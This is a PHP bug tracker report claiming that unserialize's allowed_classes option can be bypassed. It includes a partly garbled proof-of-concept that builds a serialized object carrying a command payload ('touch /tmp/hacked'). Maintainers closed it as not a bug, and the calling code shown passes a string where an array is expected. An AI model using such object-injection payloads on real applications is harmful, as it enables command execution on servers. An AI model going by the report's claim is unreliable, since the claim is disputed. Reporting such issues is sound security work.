|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #79429 $options parameter of unserialize is ignored
Submitted: 2020-03-29 17:52 UTC Modified: 2020-03-30 11:25 UTC
From: fady dot mohamed dot osman at gmail dot com Assigned: cmb (profile)
Status: Not a bug Package: Unknown/Other Function
PHP Version: Irrelevant OS: Linux
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
Block user comment
Status: Assign to:
Bug Type:
From: fady dot mohamed dot osman at gmail dot com
New email:
PHP Version: OS:


 [2020-03-29 17:52 UTC] fady dot mohamed dot osman at gmail dot com
Not sure if this is expected behavior but it seems odd, the second parameter of unserialize is completely useless, any class can be easily loaded even if not defined in the array (second parameter of unserialize), this is due to the following:

* PHP automatically defines a member variable if it doesn't exist in the class definition.
* Unserialize does the same if undefined value was provided it will define it and if it's a class it will create an object without checking if it's in the whitelist.

By providing a dummy variable that doesn't exist in a class that is allowed by the second parameter of an allowed class we can deserialize any class of our choice.

Test script:
-- Code that does the deserialization --

class Helper
public $dummy = "asdasd";
public $exec = "ls";

public function __wakeup()

class MayBe {
	public $myvar = "OK";

if(isset($_POST["serialized"])) {
  $message = "Data was unserialized!!";

-- Code to generate a serialized string that will bypass the check ---
$myhelper = new Helper;
$myclass = new  MayBe;

$myclass->myvar = "WOW";

$myhelper->exec = "touch /tmp/hacked";

//This is not defined in the MayBe class but will automatically defined upon deserialization.
$myclass->dummy = $myhelper;

echo serialize($myclass);


Expected result:
The method shouldn't deserialize a class that is not in the list.

Actual result:
Any class can be deserialized regardless of the second argument of unserialize.


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2020-03-30 11:25 UTC]
-Status: Open +Status: Not a bug -Type: Security +Type: Bug -Assigned To: +Assigned To: cmb
 [2020-03-30 11:25 UTC]
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at and the instructions on how to report
a bug at

unserialize($_POST["serialized"],['allowed_classes' => "MayBe"]);
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Tue May 21 08:01:31 2024 UTC